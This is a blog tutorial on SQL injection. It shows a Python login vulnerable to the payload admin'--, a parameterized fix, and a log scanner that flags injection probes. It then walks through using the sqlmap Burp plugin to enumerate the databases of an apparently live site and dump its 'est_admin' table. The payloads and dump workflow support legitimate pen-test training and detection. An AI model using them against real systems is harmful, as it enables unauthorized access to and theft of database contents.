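    """How the vulnerable application assembles the post's query: the
    user-supplied values are pasted straight into the SQL text."""
    return (f"SELECT * FROM users WHERE username='{username}' "
            f"AND password='{password}'")


def login_vulnerable(username: str, password: str) -> bool:
    """Login check built by string concatenation. With username admin'--
    the rest of the WHERE clause becomes a comment, so any password passes."""
    return conn.execute(build_query(username, password)).fetchone() is not None


def login_parameterized(username: str, password: str) -> bool:
    """Same check with bound parameters: the driver hands the values to the
    database separately from the SQL text, so a quote or a -- inside the
    username is just characters to compare against the column."""
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    print(build_query("admin'--", "xxx"))
    print("vulnerable   :", login_vulnerable("admin'--", "xxx"))
    print("parameterized:", login_parameterized("admin'--", "xxx"))
```

The parameterized version rejects the bypass not because it filters the input but because the username value never becomes part of the SQL statement; that is the property to check for in code review, rather than the presence of any blacklist.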

1) Manual Pen-Testing: This is the process of detecting and exploiting the vulnerability manually. We test the vulnerability by passing malicious strings and then exploit it by hand. I'll give a clear explanation of exploiting SQLi manually in my next post.

2) Automated: This can be done by running tools. There are many tools to find and exploit SQLi vulnerabilities; some of them are SQLMAP, ABSINTHE, SQL NINJA, The Mole, etc. I would love to use a tool which can be attached to the proxy that I use in my work regularly, so I chose the SQLMap plugin for Burp.


SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities and taking over database servers. SQLMAP comes with a powerful detection engine, many niche features for the penetration tester and a wide range of switches, ranging from database fingerprinting and fetching data from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Since SQLMAP is developed in Python, it is portable: it works on any operating system that supports Python.

SQLMAP burp plug-in:

When we audit a web application, we normally configure an intermediate proxy to have more control over the request and response parameters. The SQLMAP plug-in is an add-on that we can configure in Burp, through which we can redirect a URL or a request directly to SQLMAP with a single mouse click.

Plug-in Setup:

1. Download the plugin zip file from the following URL:
2. Unzip the file and keep it in the same folder where the Burp proxy is located.
3. Then execute the following command to run Burp with the plug-in.


On Linux (classpath entries separated by a colon):

java -classpath burpplugins.jar:burpsuite_v1.4.0.1.jar burp.StartBurp

On Windows (classpath entries separated by a semicolon):

java -classpath burpsuite_v1.4.0.1.jar;burpplugins.jar burp.StartBurp

*Replace burpsuite_v1.4.0.1.jar with the version that you are using. In my case I am using burpsuite_v1.4.0.1.jar. We also need to download the SQLMAP tool, as we need to supply its executable to the Burp plug-in.

Setting up SQLMAP:

For Windows,
1. Download and install Python 2.7 –
2. Download sqlmap –
3. Unzip the file to sqlmap directory.

For Ubuntu or Linux, run the below commands from the terminal

> sudo apt-get install python-tk python2.7
> git clone git://
> cd sqlmap
> wget
> unzip

Setting up the environment:

– If you are using the OWASP Broken Web Applications VM, then simply access one of its vulnerable sites from the local browser on the machine where you are running SQLMAP.
– If you don’t use OWASP broken web application, then you need to set up a virtual machine that has a web server to host the vulnerable web application.
– Configure another VM with ubuntu where the attacker runs SQLMAP

Configuring the Proxy:

– If you are using Mozilla Firefox, then go to Edit > Preferences > Advanced > Network > Settings and select "Manual Proxy Configuration" by enabling the radio button. Enter localhost as the HTTP proxy and the port on which the proxy is running.
– If you are using Chrome, then go-to settings > Show Advanced Options > Network > Change proxy Settings > Connections > Lan settings.

How to use the plug-in:

Once you load the plug-in, it is very easy to use. Run the Burp proxy with the plug-in loaded. In the "site map" tab under "target" you can see the particular domain that you are testing for SQLi and all the crawled pages related to it. On the right side, click on the URL that you want to test; the request parameters of that URL appear in the bottom panel. Right-click on the request parameters and you will see the option "Send to sqlmap", as shown in the figure below.

Forward URL To Sqlmap burp plugin

Then you will see a new window (the SQLMap wrapper) that allows you to configure sqlmap. The image below gives a clear view of the wrapper.

sqlmap plugin window

Now let's have an overview of the configuration features of the wrapper. In the "Target" text box specify the URL that you want to test. (Normally it is filled in by default, as you sent the request parameters previously; you can change the URL if needed.)

Specify the method by which the domain is accessed (GET/POST). In "Bin-path" give the path to the sqlmap executable.

If you know the DBMS of the web application, specify it by selecting one of the options in the dropdown list. By default "auto" is selected, which means that the SQLMAP wrapper tries all the databases listed in the dropdown to find out which one the application uses.

You can enumerate the database users, passwords, roles, privileges, databases, etc. by selecting the appropriate option from the Action drop-down list. By default it is set to "auto", which means it will try to enumerate all the options listed in the drop-down list in sequential order.

If you already know the databases, users, tables or columns, you can enumerate them by simply specifying them in the Database options.

Tampers are special characters or symbols that you want to insert into the query while pen-testing the application.

Once you have configured SQLMAP, click on "RUN"; this opens a new tab that executes the program with the configuration you gave to the wrapper. We can open any number of simultaneous execution tabs with different instances. The image below shows the output tab.

Sqlmap output

Bored with theory? Now let's see an example. The below URL is a vulnerable site for practicing SQLi. You can also find SQLi practice URLs by googling.

The id parameter in the above URL is vulnerable to SQLi; let's find it out through our SQLMAP wrapper (Burp Suite plug-in).

Open the URL in the browser for which the proxy has been configured. In the proxy (Burp) go to the "site map", click on the URL and send it to sqlmap by right-clicking on the request parameters, as I mentioned previously. The figure below shows the wrapper opened for the above-mentioned URL.

sqlmap plugin settings

The target specifies the URL we are testing, and cookie specifies the cookie or session id. The wrapper automatically identifies the positions in the URL where SQLi can be injected and lists those parameters in the "Parameters to test" text area (in our case there is only one candidate for injection, the "id" parameter).

In this example I have configured the SQLMAP wrapper to enumerate the list of databases present in the back-end DBMS.

burp plugin sqlmap output

The above figure shows the output tab, which displays how the plug-in tried to exploit the SQLi vulnerability in different ways.

We can see that initially the wrapper tried to exploit the vulnerability using "boolean-based blind SQLi" with the AND operator. The payload shows how the tool tried to exploit the vulnerability. Here we can see the payload: id=22 AND 4626=4626, which is equivalent to the following URL: AND 4626=4626

As the injected condition is always true, the above URL returns the same page as the original URL.

In the second trial it tried "error-based SQLi", and later the UNION operator.
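The probes listed in the output tab leave a recognisable trace in the web server's access log, which is the other side of this picture. The following added example (not part of the original post or of sqlmap) scans constructed combined-format log lines for the two patterns described above: the paired true/false integer comparison of the boolean-based blind probe (id=22 AND 4626=4626 next to a sibling that is false) and a UNION SELECT attempt. The IP addresses, path and log lines are all constructed for the demo.

```python
import re
from urllib.parse import parse_qsl, urlparse

# Constructed sample access-log lines (combined-log style, abbreviated);
# this is not real traffic. Lines 2-4 mimic the probes the post's output
# tab shows: the boolean pair "AND 4626=4626" (same size as the baseline)
# and "AND 4626=4627" (different page), then a UNION SELECT attempt.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Dec/2012:10:01:02 +0000] "GET /news.php?id=22 HTTP/1.1" 200 5123
203.0.113.5 - - [17/Dec/2012:10:01:03 +0000] "GET /news.php?id=22%20AND%204626=4626 HTTP/1.1" 200 5123
203.0.113.5 - - [17/Dec/2012:10:01:03 +0000] "GET /news.php?id=22%20AND%204626=4627 HTTP/1.1" 200 311
203.0.113.5 - - [17/Dec/2012:10:01:05 +0000] "GET /news.php?id=22%20UNION%20SELECT%20NULL,NULL-- HTTP/1.1" 200 5123
198.51.100.9 - - [17/Dec/2012:10:02:00 +0000] "GET /news.php?id=21 HTTP/1.1" 200 4890
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# "AND 4626=4626" style comparison of two integer literals appended to a value.
TAUTOLOGY_RE = re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*(\d+)", re.IGNORECASE)
UNION_RE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.IGNORECASE)


def classify_value(value: str):
    """Label one decoded query-string value, or return None if it looks benign."""
    m = TAUTOLOGY_RE.search(value)
    if m:
        return "boolean-true" if m.group(1) == m.group(2) else "boolean-false"
    if UNION_RE.search(value):
        return "union-select"
    return None


def scan_log(text: str):
    """Parse each log line, decode its query string and record every
    parameter value that matches one of the probe patterns."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these
        url = urlparse(m.group("target"))
        # parse_qsl percent-decodes, so "%20AND%20" becomes " AND ".
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                findings.append({
                    "ip": m.group("ip"), "path": url.path, "param": name,
                    "kind": kind, "status": int(m.group("status")),
                    "size": m.group("size"),
                })
    return findings


def flag_sources(findings):
    """A lone 'AND 1=1' could be noise; a true/false pair on the same parameter
    from the same client, or any UNION SELECT, marks an injection probe."""
    seen = {}
    for f in findings:
        seen.setdefault((f["ip"], f["path"], f["param"]), set()).add(f["kind"])
    flagged = [key for key, kinds in seen.items()
               if {"boolean-true", "boolean-false"} <= kinds or "union-select" in kinds]
    return sorted(flagged)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f)
    print("flagged:", flag_sources(found))
```

Note the response sizes in the findings: the true probe comes back with the same size as the baseline request and the false one does not, which is exactly the differential the tool relies on, so a log-based detector can also use size changes on the same path as a weak secondary signal.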

Retrieve database with sqlmap

From the above figure we can observe more server details like the web server, operating system and back-end DBMS.

"information_schema" and "nilakantatrust" are the two databases used by the web application.

Now let us try to enumerate all the tables, and the columns of those tables, in the above databases. To do so, configure the SQLMAP wrapper's Action field with the option "Enumerate database tables and columns". The figure below shows this.

extract tables and columns using sqlmap

The figure below shows the tables of the database "nilakantatrust".

extracted tables and columns

Let us see the columns of these tables. The figure below shows the columns and their data types for two tables, "est_notice" and "est_news", of the nilakantatrust database.

columns retrieved using sqlmap

We can also dump the complete database by selecting the option "dump dbms databases", and store all of the data into a file using the option "save to file" in the output tab.

sqlmap output to file

The above figure shows the dumped data of the table "est_admin" from the "nilakantatrust" database being stored into a file.


SQLMAP is a powerful tool used to automate the process of detecting and exploiting SQLi.

I have written this article for infosec institute. Take a look at the web application security course offered by infosecinstitute.


Posted by on December 17, 2012 in web application hacking
